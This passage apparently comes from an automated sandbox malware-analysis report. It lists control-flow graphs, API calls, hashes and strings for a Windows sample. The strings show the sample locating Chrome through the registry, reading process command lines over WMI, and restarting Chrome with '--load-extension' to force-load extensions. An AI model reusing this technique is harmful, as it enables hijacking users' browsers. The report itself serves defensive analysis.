7ff6a22f3bea-7ff6a22f3bf2 63->67 66->40 67->63 73 7ff6a22f3bf4-7ff6a22f3bfa 67->73 75 7ff6a22f3c5f-7ff6a22f3c83 RegQueryValueExW 70->75 71->75 73->43 85 7ff6a22f4039-7ff6a22f403e call 7ff6a2303938 74->85 78 7ff6a22f3eb3-7ff6a22f3ecd RegCloseKey 75->78 79 7ff6a22f3c89-7ff6a22f3d15 call 7ff6a22f9330 call 7ff6a22f8a80 call 7ff6a22fa2a0 call 7ff6a22f85b0 call 7ff6a22f9d60 call 7ff6a22f9c00 75->79 82 7ff6a22f3ed1-7ff6a22f3ed9 78->82 126 7ff6a22f3d4e-7ff6a22f3d61 RegCloseKey 79->126 127 7ff6a22f3d17-7ff6a22f3d2e 79->127 82->82 86 7ff6a22f3edb-7ff6a22f3ef3 call 7ff6a22f9330 82->86 97 7ff6a22f403f-7ff6a22f4044 call 7ff6a2303938 85->97 98 7ff6a22f3ef5-7ff6a22f3f0b 86->98 99 7ff6a22f3f2b-7ff6a22f3f42 86->99 114 7ff6a22f4045-7ff6a22f404a call 7ff6a2303938 97->114 104 7ff6a22f3f0d-7ff6a22f3f20 98->104 105 7ff6a22f3f26 call 7ff6a22fd940 98->105 99->35 106 7ff6a22f3f48-7ff6a22f3f6a call 7ff6a22f96b0 99->106 101->18 101->19 108 7ff6a22f3e64-7ff6a22f3e77 102->108 109 7ff6a22f3e7d call 7ff6a22fd940 102->109 104->74 104->105 105->99 106->55 119 7ff6a22f3f70-7ff6a22f3f83 106->119 108->109 108->114 109->101 114->31 119->85 122 7ff6a22f3f89 119->122 122->55 126->101 130 7ff6a22f3d67-7ff6a22f3d7d 126->130 128 7ff6a22f3d30-7ff6a22f3d43 127->128 129 7ff6a22f3d49 call 7ff6a22fd940 127->129 128->97 128->129 129->126 130->109 132 7ff6a22f3d83-7ff6a22f3d96 130->132 132->74 133 7ff6a22f3d9c 132->133 133->109
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.2586715311.00007FF6A22F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A22F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.2586654665.00007FF6A22F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586813305.00007FF6A232A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586833054.00007FF6A232D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff6a22f0000_graph.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Lockitstd::_$CloseLockit::_Lockit::~_$Concurrency::cancel_current_taskOpenQueryValue
                                                                                                                                                                          • String ID: --type=e$--type=renderer$BLBeacon$Chrome path not found in registry.$CommandLine$Could not connect to WMI.$Error: $Failed to create IWbemLocator object.$Failed to open registry key: $Failed to query registry value for Chrome path.$Query for process command line failed.$ROOT\CIMV2$SELECT CommandLine FROM Win32_Process WHERE ProcessId = $SOFTWARE\Google\Chrome\BLBeacon$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe$SOFTWARE\WOW6432Node\Google\Chrome\BLBeacon$WQL$path$xtension
                                                                                                                                                                          • API String ID: 381035148-1962832953
                                                                                                                                                                          • Opcode ID: 24b9a8dd0c45d2cc3dd6b9011bf490f9b4e2d7b4f2176567959fe523597c4710
                                                                                                                                                                          • Instruction ID: 0009e5f61a09d941787f6631127ae3832513d604e7c759cca265f6e57a4a367c
                                                                                                                                                                          • Opcode Fuzzy Hash: 24b9a8dd0c45d2cc3dd6b9011bf490f9b4e2d7b4f2176567959fe523597c4710
                                                                                                                                                                          • Instruction Fuzzy Hash: DA02C062F9AB8185EB10DB65D5402BE2361FF857A8F505331EA6D83AD9DFBCD190D300

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 134 7ff6a22f5ea0-7ff6a22f5f06 135 7ff6a22f5f0b-7ff6a22f5f41 call 7ff6a22f9330 call 7ff6a22f88a0 134->135 136 7ff6a22f5f08 134->136 141 7ff6a22f621c-7ff6a22f622e call 7ff6a22f3210 135->141 142 7ff6a22f5f47-7ff6a22f5f4f 135->142 136->135 151 7ff6a22f622f-7ff6a22f6234 call 7ff6a2303938 141->151 143 7ff6a22f5f51-7ff6a22f5f67 142->143 144 7ff6a22f5f87-7ff6a22f5f97 142->144 146 7ff6a22f5f82 call 7ff6a22fd940 143->146 147 7ff6a22f5f69-7ff6a22f5f7c 143->147 149 7ff6a22f5fa2-7ff6a22f5fb0 144->149 150 7ff6a22f5f99-7ff6a22f5f9d 144->150 146->144 147->146 147->151 153 7ff6a22f5fb2-7ff6a22f5fb6 149->153 154 7ff6a22f5fbb-7ff6a22f5fcb 149->154 150->149 163 7ff6a22f6235-7ff6a22f6245 call 7ff6a22f3210 151->163 153->154 155 7ff6a22f5ffe 154->155 156 7ff6a22f5fcd-7ff6a22f5fd7 154->156 159 7ff6a22f6003-7ff6a22f6006 155->159 156->155 158 7ff6a22f5fd9-7ff6a22f5ff0 156->158 158->155 170 7ff6a22f5ff2-7ff6a22f5ffd 158->170 161 7ff6a22f616c-7ff6a22f6174 159->161 162 7ff6a22f600c-7ff6a22f6024 call 7ff6a22f32e0 159->162 164 7ff6a22f6176-7ff6a22f6180 161->164 165 7ff6a22f61a7-7ff6a22f61af 161->165 176 7ff6a22f6035-7ff6a22f6038 162->176 177 7ff6a22f6026-7ff6a22f602f 162->177 164->165 169 7ff6a22f6182-7ff6a22f6199 164->169 171 7ff6a22f61b1-7ff6a22f61bb 165->171 172 7ff6a22f61df-7ff6a22f620d call 7ff6a22fd920 165->172 169->165 184 7ff6a22f619b-7ff6a22f61a6 169->184 170->155 171->172 175 7ff6a22f61bd-7ff6a22f61d2 171->175 175->172 189 7ff6a22f61d4-7ff6a22f61d9 175->189 182 7ff6a22f60d2-7ff6a22f60d6 176->182 183 7ff6a22f603e-7ff6a22f6059 call 7ff6a22f7bd0 176->183 177->163 177->176 186 7ff6a22f60da call 7ff6a22fccc8 182->186 191 7ff6a22f6083-7ff6a22f6090 call 7ff6a22fa6f0 183->191 192 7ff6a22f605b-7ff6a22f6081 183->192 184->165 190 7ff6a22f60df-7ff6a22f60e2 186->190 189->172 194 7ff6a22f60e4-7ff6a22f60e6 190->194 195 7ff6a22f6117-7ff6a22f612c 190->195 196 7ff6a22f6095-7ff6a22f6099 191->196 192->196 200 7ff6a22f6214-7ff6a22f621b call 7ff6a22f3120 194->200 201 7ff6a22f60ec-7ff6a22f60f1 194->201 198 7ff6a22f612e-7ff6a22f6138 195->198 199 7ff6a22f615c-7ff6a22f6161 195->199 196->182 204 7ff6a22f609b-7ff6a22f60b2 196->204 205 7ff6a22f613a-7ff6a22f614c 198->205 206 7ff6a22f6157 198->206 199->200 207 7ff6a22f6167 199->207 200->141 208 7ff6a22f60f3-7ff6a22f60fa 201->208 209 7ff6a22f6109-7ff6a22f6115 call 7ff6a22f3640 201->209 213 7ff6a22f60b4-7ff6a22f60c7 204->213 214 7ff6a22f60cd call 7ff6a22fd940 204->214 205->206 221 7ff6a22f614e-7ff6a22f6151 205->221 206->199 207->159 208->182 210 7ff6a22f60fc-7ff6a22f6100 208->210 209->199 210->209 215 7ff6a22f6102-7ff6a22f6107 210->215 213->214 217 7ff6a22f620e-7ff6a22f6213 call 7ff6a2303938 213->217 214->182 215->182 215->209 217->200 221->206
                                                                                                                                                                          APIs
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A22F620E
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A22F622F
                                                                                                                                                                            • Part of subcall function 00007FF6A22FCCC8: FindNextFileW.KERNEL32(?,?,?,?,00007FF6A22F357D,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00007FF6A22FCCCC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.2586715311.00007FF6A22F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A22F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.2586654665.00007FF6A22F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586813305.00007FF6A232A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586833054.00007FF6A232D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff6a22f0000_graph.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$FileFindNext
                                                                                                                                                                          • String ID: &$--load-e$C:\Program Files\Google\Chrome\Extensions$Chrome path is missing. Exiting.$Error: $Extensions path not found or invalid: $Failed to create snapshot of processes.$Info: $Main Chrome process already has --load-extension argument. No action taken.$Main Chrome process does not have --load-extension argument. Restarting Chrome with extensions.$chrome.exe$directory_entry::status$directory_iterator::directory_iterator$status$xtension
                                                                                                                                                                          • API String ID: 2925584965-66935618
                                                                                                                                                                          • Opcode ID: e165e78220ce2ff56e5cfe31366d27908780c7a8eacbb97da4cfb996d85b6275
                                                                                                                                                                          • Instruction ID: 994ef20881de908de548c2f92121906e260141847c431a9b1ee43a254bd3f3bb
                                                                                                                                                                          • Opcode Fuzzy Hash: e165e78220ce2ff56e5cfe31366d27908780c7a8eacbb97da4cfb996d85b6275
                                                                                                                                                                          • Instruction Fuzzy Hash: 6BB1A672E4AB8182EB10CB25D64027E63A0FF85B98F148235DE5D83BA9DF7CD591D740

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.2586715311.00007FF6A22F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A22F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.2586654665.00007FF6A22F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586813305.00007FF6A232A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586833054.00007FF6A232D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff6a22f0000_graph.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Lockitstd::_$InitializeLockit::_Lockit::~__invalid_parameter_noinfo_noreturn$Security
                                                                                                                                                                          • String ID: Error: $Failed to initialize COM library.$Failed to initialize security.
                                                                                                                                                                          • API String ID: 2382761477-123418321
                                                                                                                                                                          • Opcode ID: ba260c1c2a26161347653c039e5bbf3f01a4e87380301f3cc0760fa37486ee4d
                                                                                                                                                                          • Instruction ID: 3e7740debcd8780496b5b77f69f9122007f7ebdc9c74b426e2cc9a7941701551
                                                                                                                                                                          • Opcode Fuzzy Hash: ba260c1c2a26161347653c039e5bbf3f01a4e87380301f3cc0760fa37486ee4d
                                                                                                                                                                          • Instruction Fuzzy Hash: A151C7A2B9AB4282EE00DB65E54027E6351EFD5798F504231EA5DC3AE9DFFCE090D700

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF6A2303A8D,?,?,?,?,00007FF6A2309D90), ref: 00007FF6A230A297
                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF6A2303A8D,?,?,?,?,00007FF6A2309D90), ref: 00007FF6A230A2CD
                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF6A2303A8D,?,?,?,?,00007FF6A2309D90), ref: 00007FF6A230A2FA
                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF6A2303A8D,?,?,?,?,00007FF6A2309D90), ref: 00007FF6A230A30B
                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF6A2303A8D,?,?,?,?,00007FF6A2309D90), ref: 00007FF6A230A31C
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF6A2303A8D,?,?,?,?,00007FF6A2309D90), ref: 00007FF6A230A337
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.2586715311.00007FF6A22F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A22F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.2586654665.00007FF6A22F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586813305.00007FF6A232A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586833054.00007FF6A232D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff6a22f0000_graph.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                          • Opcode ID: f2a1fb28ecb3c33ef7905b00eb992fa680b77dbb01d10cbc44ffca28e50c3a95
                                                                                                                                                                          • Instruction ID: 6d8c6c410e818c23e3410e77ef510a18855f330c2e008946e4ec7815ed83386d
                                                                                                                                                                          • Opcode Fuzzy Hash: f2a1fb28ecb3c33ef7905b00eb992fa680b77dbb01d10cbc44ffca28e50c3a95
                                                                                                                                                                          • Instruction Fuzzy Hash: 4311A120E9FF4242FA1C5331665513923926F4A7B8F1447B4DA2E866C6DEACF402A364

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.2586715311.00007FF6A22F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A22F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.2586654665.00007FF6A22F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586813305.00007FF6A232A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586833054.00007FF6A232D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff6a22f0000_graph.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                          • Opcode ID: c4a13060624ac91f3377dc4cc097d7834cd0d7b54bd5f9c261dcc4a468dbd74e
                                                                                                                                                                          • Instruction ID: ca0ccc6445686374737a8951b79f736552d06ae99e2c983b50e6ea319b302402
                                                                                                                                                                          • Opcode Fuzzy Hash: c4a13060624ac91f3377dc4cc097d7834cd0d7b54bd5f9c261dcc4a468dbd74e
                                                                                                                                                                          • Instruction Fuzzy Hash: 0E316E20ECF64341FA24AB25D6123BA2391AF5274CF8400B5E50ECB6DBDEECE414F651

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6A22FDAA4
                                                                                                                                                                            • Part of subcall function 00007FF6A22FFCB0: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6A22FFCB8
                                                                                                                                                                            • Part of subcall function 00007FF6A22FFCB0: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF6A22FFCBD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.2586715311.00007FF6A22F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A22F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.2586654665.00007FF6A22F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586813305.00007FF6A232A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586833054.00007FF6A232D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff6a22f0000_graph.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1208906642-0
                                                                                                                                                                          • Opcode ID: c5d88f84bb4b83c855101d1bcf7bd546a7308184fc82c24ecf2dd024a6b03203
                                                                                                                                                                          • Instruction ID: 4510356fd02e7ab49e24f38acdbcbad4f848895df993728d65835d324c501ab6
                                                                                                                                                                          • Opcode Fuzzy Hash: c5d88f84bb4b83c855101d1bcf7bd546a7308184fc82c24ecf2dd024a6b03203
                                                                                                                                                                          • Instruction Fuzzy Hash: 4FE0B614DCF64340FD66762003126BB03411F2234DF4418B8D85DC26CB9DCDA566B22A

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.2586715311.00007FF6A22F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A22F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.2586654665.00007FF6A22F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586813305.00007FF6A232A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586833054.00007FF6A232D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff6a22f0000_graph.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __vcrt_uninitialize_ptd
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1180542099-0
                                                                                                                                                                          • Opcode ID: 5de98303c41e9346c0a2a760e4f8f991aee0dd986fe3d4573fbd14565e1c3639
                                                                                                                                                                          • Instruction ID: 90d3ff20467c77a9a516117babf8f0791e16d43ec0166c72f253fd69f6cb64ff
                                                                                                                                                                          • Opcode Fuzzy Hash: 5de98303c41e9346c0a2a760e4f8f991aee0dd986fe3d4573fbd14565e1c3639
                                                                                                                                                                          • Instruction Fuzzy Hash: FEE08C68ECFE0282E95C6B3034460B813402F2731CFA40AF4DB1EC23C2EEAD65023231

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,00000000,00007FF6A230A2EA,?,?,?,00007FF6A2303A8D,?,?,?,?,00007FF6A2309D90), ref: 00007FF6A230AE85
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.2586715311.00007FF6A22F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A22F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.2586654665.00007FF6A22F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586813305.00007FF6A232A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.2586833054.00007FF6A232D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff6a22f0000_graph.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                          • Opcode ID: 2468a55251dc1a4b06199852671c7c6a39654f1c1ef5f0a76e1adb49ec930e94
                                                                                                                                                                          • Instruction ID: 1100e818061e2b07e4b668b42435e44c97d4e67ac24aa529beaf16abafb48b0b
                                                                                                                                                                          • Opcode Fuzzy Hash: 2468a55251dc1a4b06199852671c7c6a39654f1c1ef5f0a76e1adb49ec930e94
                                                                                                                                                                          • Instruction Fuzzy Hash: DDF06D44B8FF0341FE59576265402F553845F8AF88F0C98B4CA8EC63D1EE9CE980E230